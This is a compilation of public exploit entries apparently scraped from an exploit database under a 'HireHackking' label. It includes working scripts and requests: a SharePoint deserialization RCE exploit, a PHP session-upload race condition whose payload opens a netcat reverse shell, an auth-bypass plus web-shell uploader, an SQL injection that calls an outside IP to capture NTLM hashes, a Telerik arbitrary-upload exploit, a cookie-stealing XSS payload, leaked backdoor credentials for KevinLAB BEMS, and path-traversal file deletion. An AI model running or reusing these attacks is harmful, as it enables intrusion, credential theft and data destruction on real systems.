xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>""".replace('{GADGET}', self.gadget) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def parse_page(self, content): soup = BeautifulSoup(content, 'lxml') for key, val in self.form_values.iteritems(): try: for tag in soup.select('input[name=%s]' % key): try: self.form_values[key] = tag['value'] except Exception as error: stderr.write('error for key %s error %s\n' % (key, str(error))) except Exception as error: stderr.write('error for selector %s error %s\n' % (key, str(error))) return self def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def clean(self, payload): payload = payload.replace('\n', '').replace('\r', '') while ' ' in payload: payload = payload.replace(' ', ' ') return payload def get_form(self): url = '%s%s' % (self.target, self.control_path) resp = self.do_get(url=url, params=self.query_params) self.parse_page(content=resp.content) return resp def send_payload(self): url = '%s%s' % (self.target, self.control_path) # self.get_form() self.headers['Content-Type'] = 'application/x-www-form-urlencoded' self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) self.form_values['__viewstate'] = '' resp = self.do_post(url=url, params=self.query_params, data=self.form_values) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit') try: parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ') parser.add_argument("-username", action='store', default='', help='Username to use: first.last') parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local') parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020') parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False') parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False') parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, username=options.username, domain=options.domain, password=options.password, target=options.target ) if options.debug: exp.debug() stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % ( options.target, options.username, options.domain, options.password, options.debug, options.proxy )) result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) if 'MicrosoftSharePointTeamServices' in result.headers: stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices']) if options.both and result.status_code != 200: exp.control_path = exp.control_path_quicklinksdialogform stdout.write('Trying alternate page\n') result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))
HireHackking
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection # Date: 26/7/2021 # Exploit Author: SiLvER | Faisal Alhadlaq # Tested on: PHP Version is 7.3.15-3 # This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat #!/usr/bin/python3 """ Usage : python3 poc.p <Target URL> <ListnerIP> <ListnerPORT> python3 poc.py https://xyz.xyz 192.168.1.15 1337 """ import requests import threading import datetime import sys x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) newDatetime = x + addSeconds def fuzz(): targetIP = sys.argv[1] listnerIP = sys.argv[2] listnerPORT = sys.argv[3] global newDatetime while True: try: if datetime.datetime.now() > newDatetime: exit() # proxies = { # "http": "http://127.0.0.1:8080", # "https": "https://127.0.0.1:8080", # } sessionName = "SiLvER" url = targetIP s = requests.Session() cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')} # You need to change the parameter in your case , here the vulnerabile parameter is (lfi) params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),) x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n") threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) < 4: print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) By SiLvER \n") exit() else: main()
HireHackking
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE # Exploit Author: Javier Olmedo # Date: 27/07/2021 # Vendor: Sourcecodester # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip # Affected Version: 1.0 # Category: WebApps # Platform: PHP # Tested on: Ubuntu Server & Windows 10 Pro import os, re, sys, argparse, requests from termcolor import cprint def banner(): os.system("cls") print(''' ___________ __ \_ _____/__ __ ____ _____/ |_ | __)_\ \/ // __ \ / \ __\\ | \\\\ /\ ___/| | \ | /_______ / \_/ \___ >___| /__| \/ \/ \/ Registration System --[Authentication Bypass and RCE]-- @jjavierolmedo ''') def get_args(): parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy') args = parser.parse_args() return args def auth_bypass(s, proxies, url): data = { "username":"admin'#", "password":"" } r = s.post(url, data=data, proxies=proxies) if('{"status":"success"}' in r.text): cprint("[+] Authenticacion Bypass Success!\n", "green") return s else: cprint("[-] Authenticacion Bypass Error!\n", "red") sys.exit(0) def upload_shell(s, proxies, url): content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>" file = { 'img':('cmd.php',content) } data = { "name":"Event Registration System with QR Code - PHP", "short_name":"ERS-QR-PHP", } r = s.post(url, files=file, data=data, proxies=proxies) if('1' in r.text and r.status_code == 200): cprint("[+] Upload Shell Success!\n", "green") return s else: cprint("[-] Upload Shell Error!\n", "red") sys.exit(0) def get_shell_url(s, proxies, url): r = s.get(url, proxies=proxies) regex = '\_cmd.php"> (.*?)</a></li>' shell_name = re.findall(regex, r.text)[0] url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name) cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green") def main(): banner() args = get_args() target = args.target proxies = {'http':'','https':''} if args.proxy: proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)} login_url = target + "/event/classes/Login.php?f=rlogin" upload_url = target + "/event/classes/SystemSettings.php?f=update_settings" shell_url = target + "/event/uploads/" s = requests.Session() s = auth_bypass(s, proxies, login_url) s = upload_shell(s, proxies, upload_url) s = get_shell_url(s, proxies, shell_url) if __name__ == "__main__": try: main() except KeyboardInterrupt: cprint("[-] User aborted session\n", "red") sys.exit(0) # Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo
HireHackking

TripSpark VEO Transportation - Blind SQL Injection

HACKER · %s · %s

# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection # Google Dork: inhtml:"Student Busing Information" # Date: 07/27/2021 # Exploit Author: Sedric Louissaint @L_Kn0w # Vendor Homepage: https://www.tripspark.com # Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf # Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084 # OS Tested on: Microsoft Windows Server 2012 R2 Standard # Vender Notified: 01/19/2021 # Confirmed Patch was released : 06/15/2021 # Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability. # PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound). ``` POST / HTTP/1.1 Host: vulnerable.site.net User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 4700 Origin: vulnerable.site.net Connection: close Referer: https:// vulnerable.site.net Cookie: ASP.NET_SessionId=x Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 __VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit ```
HireHackking
# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) # Date: 21/03/2021 # Exploit Author: Amin Bohio # Original Research & Code By: Paul Taylor / Foregenix Ltd # Original Exploit: https://github.com/bao7uo/RAU_crypto # Vendor Homepage: https://www.gfi.com # Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver # Vulnerable Versions: GFI Mail Archiver <= 15.1 # Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload # Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference # Tested on: Windows & Linux # Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver #!/usr/bin/python3 # Original Telerik Exploit Author: Paul Taylor / @bao7uo # https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py # Modified by: Amin Bohio import sys import base64 import json import re import requests import os from Crypto.Cipher import AES from Crypto.Hash import HMAC from Crypto.Hash import SHA256 from Crypto.Hash import SHA1 from struct import Struct from operator import xor from itertools import starmap import binascii from requests.packages.urllib3.exceptions import InsecureRequestWarning # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 1 of 2 # Warning, the below prevents certificate warnings, # and verify = False (CERT_VERIFY prevents them being verified requests.packages.urllib3.disable_warnings(InsecureRequestWarning) CERT_VERIFY = False # ****************************************** # ****************************************** class PBKDF: def sha1(v): hl = SHA1.new() hl.update(v) return hl.digest() def derive1(password, salt): hash = (password + salt).encode() for i in range(0, 99): hash = PBKDF.sha1(hash) result = PBKDF.sha1(hash) i = 1 while len(result) < 48: result += PBKDF.sha1(str(i).encode() + hash) i += 1 return result def hmacsha1(v): hl = PBKDF.mac.copy() hl.update(v) return bytearray(hl.digest()) def derive2(password, salt): # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py result_length = 48 PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new()) result = [] for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1): rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b)) for i in range(999): u = PBKDF.hmacsha1(u) rv = starmap(xor, zip(rv, u)) result.extend(rv) result = b''.join(map(bytes, [result]))[:result_length] return result def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])): if type == 1: result = PBKDF.derive1(password, salt) result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack elif type == 2: result = PBKDF.derive2(password, salt) return result[0:32], result[32:] class RAUCipher: # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 2 of 2 # Default settings are for vulnerable versions before 2017 patches with default keys T_Upload_ConfigurationHashKey = \ "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey T_AsyncUpload_ConfigurationEncryptionKey = \ "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password # Latest tested version working with this setting: 2018.1.117 # Probably working up to and including 2018.3.910 PBKDF_ALGORITHM = 1 # Earliest tested version working with this setting: 2019.2.514 # Probably introduced 2019.1.115 # PBKDF_ALGORITHM = 2 # ****************************************** # ****************************************** key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD) # print(binascii.hexlify(key).decode().upper()) # print(binascii.hexlify(iv).decode().upper()) def encrypt(plaintext): sys.stderr.write("Encrypting... ") encoded = "" for i in plaintext: encoded = encoded + i + "\x00" plaintext = encoded + ( chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16)) ) cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) sys.stderr.write("done\n") return base64.b64encode(cipher.encrypt(plaintext.encode())).decode() def decrypt(ciphertext): sys.stderr.write("Decrypting... ") ciphertext = base64.b64decode(ciphertext) cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) unpad = lambda s: s[0:-ord(chr(s[-1]))] sys.stderr.write("done\n") return unpad(cipher.decrypt(ciphertext)).decode()[0::2] def addHmac(string, Version): isHmacVersion = False # "Encrypt-then-MAC" feature introduced in R1 2017 # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.) if int(Version[:4]) >= 2017: isHmacVersion = True hmac = HMAC.new( bytes(RAUCipher.HASHKEY.encode()), string.encode(), SHA256.new() ) hmac = base64.b64encode(hmac.digest()).decode() return string + hmac if isHmacVersion else string def getProxy(proxy): return { "http" : proxy, "https" : proxy } def rauPostData_enc(partA, partB): data = "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n" data += "\r\n" data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n" return data def rauPostData_prep(TempTargetFolder, Version): TargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(""), Version ) TempTargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(TempTargetFolder), Version ) partA = \ '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \ TempTargetFolder + \ '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' partB = \ "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" return rauPostData_enc(partA, partB) def payload(TempTargetFolder, Version, payload_filename): sys.stderr.write("Local file path: " + payload_filename + "\n") payload_filebasename = os.path.basename(payload_filename) sys.stderr.write("Destination file name: " + payload_filebasename + "\n") sys.stderr.write("Destination path: " + TempTargetFolder + "\n") sys.stderr.write("Version: " + Version + "\n") sys.stderr.write("Preparing payload... \n") payload_file = open(payload_filename, "rb") payload_file_data = payload_file.read() payload_file.close() data = rauPostData_prep(TempTargetFolder, Version) data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" data += "Content-Type: application/octet-stream\r\n" data += "\r\n" data += payload_file_data.decode("raw_unicode_escape") + "\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"fileName\"\r\n" data += "\r\n" data += "RAU_crypto.bypass\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"contentType\"\r\n" data += "\r\n" data += "text/html\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" data += "\r\n" data += "2019-01-02T03:04:05.067Z\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"metadata\"\r\n" data += "\r\n" data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ payload_filebasename + "\"}\r\n" data += "-----------------------------62616f37756f2f--\r\n" data += "\r\n" sys.stderr.write("Payload prep done\n") return data def upload(data, url, proxy = False): global CERT_VERIFY sys.stderr.write("Preparing to send request to " + url + "\n") session = requests.Session() request = requests.Request( "POST", url, data=data ) request = request.prepare() request.headers["Content-Type"] = \ "multipart/form-data; " +\ "boundary=---------------------------62616f37756f2f" response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) sys.stderr.write("Request done\n") return response.text def decode_rauPostData(rauPostData): rauPostData = rauPostData.split("&") rauJSON = RAUCipher.decrypt(rauPostData[0]) decoded = "\nJSON: " + rauJSON + "\n" TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] decoded = decoded + "\nTempTargetFolder = " + \ RAUCipher.decrypt(TempTargetFolder) + "\n" rauVersion = RAUCipher.decrypt(rauPostData[1]) decoded = decoded + "\nVersion: " + rauVersion + "\n" return decoded def mode_decrypt(): # decrypt ciphertext ciphertext = sys.argv[2] print("\n" + RAUCipher.decrypt(ciphertext) + "\n") def mode_Decrypt_rauPostData(): # decrypt rauPostData rauPostData = sys.argv[2] print(decode_rauPostData(rauPostData)) def mode_encrypt(): # encrypt plaintext plaintext = sys.argv[2] print("\n" + RAUCipher.encrypt(plaintext) + "\n") def mode_Encrypt_rauPostData(): # encrypt rauPostData based on TempTargetFolder and Version TempTargetFolder = sys.argv[2] Version = sys.argv[3] print( "rauPostData: " + rauPostData_prep(TempTargetFolder, Version) + "\n" ) def mode_payload(): # generate a payload based on TempTargetFolder, Version and payload file TempTargetFolder = sys.argv[2] Version = "2013.1.417.40" payload_filename = sys.argv[4] print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") print(payload(TempTargetFolder, Version, payload_filename)) def mode_Post(proxy = False): # generate and upload a payload based on # TempTargetFolder, Version, payload file and url Version = "2013.1.417.40" url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" payload_filename = sys.argv[4] TempTargetFolder = sys.argv[6] print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) print("\n[+] Check your uploaded file\n"); def mode_help(): print( "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'") sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") if len(sys.argv) < 2: mode_help() elif sys.argv[1] == "-u" and len(sys.argv) == 7: mode_Post() else: mode_help()
HireHackking
# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS) # Date: 18/07/2021 # Exploit Author: Vikas Srivastava # Vendor Homepage: # Software Link: https://wordpress.org/plugins/mimetic-books/ # Version: 0.2.13 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Mimetic Books 3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>
HireHackking

KevinLAB BEMS 1.0 - Undocumented Backdoor Account

HACKER · %s · %s

# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5654 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php 05.07.2021 -- Backdoor accounts from the DB: ------------------------------ Username: kevinlab (permission=1) Password: kevin003 Username: developer1 (permission=6) Password: 1234
HireHackking

CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion

HACKER · %s · %s

# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion # Date: 2021-07-20 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.cszcms.com # Software Link: https://sourceforge.net/projects/cszcms/files/latest/download # Version: 1.2.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/cskaza/cszcms/issues/32 ################ # Description # ################ # CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php Steps to Reproduce: 1. Login as admin 2. Goto Plugin Manager > Article > edit any article 3. Upload any image as "Main Picture" and "File Upload" and click save button 4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" 1) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root Request: ======== POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 Host: localhost Content-Length: 2048 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 Connection: close ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="title" article beta ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="keyword" testing file ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="short_desc" deletion ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="cat_id" 2 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="content" <div class="row"> <div class="col-md-12"> <p>test for file deletion</p> </div> </div> <p><br><br></p> ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file" ../../../conf_secret_file.php ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainPicture" 2021/1626802955_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file2" ../../../config_backup.txt ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload2"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainFile" 2021/1626802956_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="lang_iso" en ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_limit" 5 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_sort" reverse_time ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundaryAMyATk1BfQaBOHvY-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php Steps to Reproduce: 1. Login as admin 2. Goto General Menu > Site Setting 3. Upload any image as "Site Logo" and "Image of og metatag" and click save button 4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image" 2) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root Request: ======== POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1 Host: localhost Content-Length: 5163 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu Connection: close ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTitle" CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="title_setting" 2 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteFooter" &copy; %Y% CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteKeyword" CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTheme" cszdefault ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLang" english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_metatag" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_js" 